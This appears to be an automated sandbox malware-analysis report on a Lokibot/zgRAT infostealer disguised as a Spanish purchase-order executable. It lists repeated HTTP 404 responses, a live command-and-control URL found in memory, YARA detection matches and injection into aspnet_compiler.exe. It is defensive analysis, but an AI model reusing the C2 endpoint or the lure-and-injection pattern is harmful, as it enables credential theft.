                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53UoM9TZDZ5P4vSHYRHpQXGjB7ycjUl2WabI3sV5SzZifxyJ6fSV8B3znhxp%2BxFMUAEokx%2FtkiC80NrdZC0KuU%2BLLPcVAB72HjCa2v%2B2pOKp8I12CIVY6Pal2iAMBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada9f98eae96e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1401&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nIPXRH24tmkWLVMfYjNnVn7AP2DtbRqy8%2F9aCwnTmm6COYwuiN%2F6n5bJQEnJ7qi6L%2FlLTYiOqn%2BCE%2Btbbh1yyfharJrZvxVdQuCKwphs6itfy6Gr3O51rgyFMJ74RA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adaa71fe43ad0-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1321&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=74&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OHuJdcwKj988xBjxnpLVZjMYvLyH1fDaGolI%2B7Qp3DWekDJug6sgjzSSudcwX2nE2EoWgx7BFZBiUdz2WND9wLIWmrGUuTjKQtPOig7dBAuota3lvqvGmlY2AiPQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adaadeb1ee926-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1106&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhJXDEKBhNkC%2Bgvm8EJsAvNS0%2FLPpSAwULwrWuA01NlXDJgqyDLZl88kGprTU8DOW5IfQGSHptGIhLrXQIMUtCysnlxF%2FRpMYbQhD%2FB6sDDEHh%2B%2FmrcNWF3A2sfA%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adab589bf478a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1290&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ec4v7cdsj9R7lJkSwshjm2sBzz0Yi3SqhlCd2dYWVSmxitBjtqDvl7McAuTUCe6SWa6zlUHaW3PBNhDVhPvAOko1%2BVHDFaKEbxEaLgB77mV%2Fk9D4fiUPkdtIIBygsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adabf6a15e82f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1457&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLaykezu7Zz0z2O%2FoypISLitca3YiOdR%2FRaPUBmpn10UxgXOQ2%2FEc1RI72cUF7DXb%2BsUDvZ%2BOQiibwkWN%2FQ8QvMxSJSxJX3keTyIBHxe1SLhp0js7Nga3F2nb5pbDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adacad8aaead9-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1331&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aokre7JlNsIawmJyupBwGeDMFWPy9J4ZT2d4CbPbHagYmspz8noRggwSRTKFUu0yLZ73kcgkmvx4bs1Gvi9faLl6UYZJX3d%2B8oIYmzPS31LwB4HrPFyAlycRod0%2F%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adad7af6a4774-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1093&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUAhUd8ttVOU9iQmDkVjviHt%2FXF1690rNHiGhdwfbCrcYgX9qWBqhnqrF0%2BHt09zNJl3%2FK1%2Fasm2U4Es%2BWEIyfwDoGFLhnERXNZSKclB%2BV%2FuLd0oh0qHz2J5NvF3EQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adae38c226c3f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1960&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2YVYdYvB9Cb13Q13HoijNG2JbuyfazCk4JFPV1kmQvpO4WkAxyOO4fPGDk1%2FdhjdpqKmDR8RuFr1%2FYbEOJ5OGNlBdhxGTptsYtOfKOQz%2B1jerauTyU3M%2F6Yx%2BWbaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adaea1916e77d-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2687&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2F8Dg55V4vzwndC76cyd2AQMgBj4YbWMhYIa4bISoMztEWeC6XGX%2FQHuUNT3i9qjO9bB3pH8GYDx251YciV8YC6K8PqR4qMI9eksE%2FtLBLOfRY%2BZdRGNvclnJKWi3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adaf36fff3aac-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1141&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=arvzRh4D50zz0cGv9%2Fp%2B65cbO4r9XT4fD8aTYL0lC7SzW9RB66gozn8PE53drTYmJUetbJaDIWvGY%2BLR8BFosj%2B9QX%2BU1xUsMsoXmng%2B02C7nrK11RjLo1znHiXGCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adafa5bf06c28-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1929&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZpP48vVEFaoIJXmJweJdMcqvE32HQne95DJ4%2BpbCorqz19Rdm9FHDeKInDttE5ENIbtztiJFigyEfLTykX7Jo1yXON2Gd0nHrUYH%2BNusi6LJTXSuwysaIqIWt%2BbjQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb045dfbe7df-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2058&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWa4g5hds29eH2hu8idLkFWYdOYJE7ClKfa96z%2BbHnfAUM5dtw2%2FzF%2FIn786%2BtGTFK6YsLkdO4XzbPVTXrxsDjLrDuDrP5LNm3Wpnsvk6rkNzY1ES3h2FITneWSmxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb1a5859e7aa-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1567&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mthHisWz0XpCVOYwRB6iqtkAod4n7LnHPrMwsnF5yo2DlqlDh7Bs4xkcBH4czccZXvNZ0CcLCGAWZmptILSpN0FCYwOP%2FaFRUv6KJCSqc61Q5NqSnrFlvmEs2WPqEQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb25c9bfe9b1-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2032&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dJfa1hiYNLN1jWlhq%2FqZLFUFkOHcKKD%2BBvBDW0pOAmL%2BE0YmUkcrXFRhmmU0vMUgyf41AvGxIGg2VsGSFPciVz64V5bKAlRPXC%2FHTK%2B5vheCwqvDaJ86kfO5R6KMwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb302dbaeb2f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1094&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNqxsd1pUSYqptvMagBIhW9j9rA0LVQyajgvXmU2jWsUPUaK3UyzBM1MSPU10pBUhsnguEel%2FS9Lfc4Xly3DEE0pcm%2BUuqhbA6o4q54gk%2FlRlclmNknMuZ7mQICBFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb481d716b1d-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1373&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:04:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D69zyd2CmaCqyBI00eXhuBCNz1HQRQgyhCJkeShuBfNuQ5%2F8qpc%2BJxTm4qdwsSDjMBFgcuyIioTs7ci0fARwHieEMjUBmW8ebSZ7VKYMgUOaAIxPKxXFuW4oWC%2BaWQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb521f52e9ca-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2231&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:04:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNYo7VG3OL66n7smhCPctkTkmvWh6szOKNrT0SGzHaDYrAQtqbk6QL4VfOyd1%2B1KQBnoGvzVNfKIVjtOFnSSmSQUZUXvrNbBTiMDWsEHpkTGvW7UQ9xDTiTMMtJuug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb731faa6b51-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:04:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rTIu3Xa9n%2FRNYYgxgBO1owPFBvIZrGWUg%2BEKFWBmKougVFgHZuTwrvrC9AC974qF0bXnRV4%2FKnoCDwrAz73xAd0JYIvMBJ%2BcNFzbk6g%2FT%2BJuBlhngNIuWeh5LOLvzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb79cade474a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2008&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:04:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMYPnjzitArtv%2BpXSPf1c%2BvhKrzavh9oSC5vxt8Vsn73nAzg48C%2B2Ug3GtAAwizAOLB%2Fq9FtaSU%2FBvVHyzyMJc%2FZ3parcBlPk0ijTuy8dVpp0hmRwkwEI7m18CrVmQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb836f1fea0a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                      Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                      Source: aspnet_compiler.exe, 00000002.00000002.3328760940.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.3328488455.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dddotx.shop/Mine/PWS/fre.php

                      System Summary

                      barindex
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: aspnet_compiler.exe PID: 6128, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040549C2_2_0040549C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004029D42_2_004029D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0041219C appears 45 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00405B6F appears 42 times
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2114914524.000000000126E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rPedidodecompra__PO20441__ARIMComponentes.exe
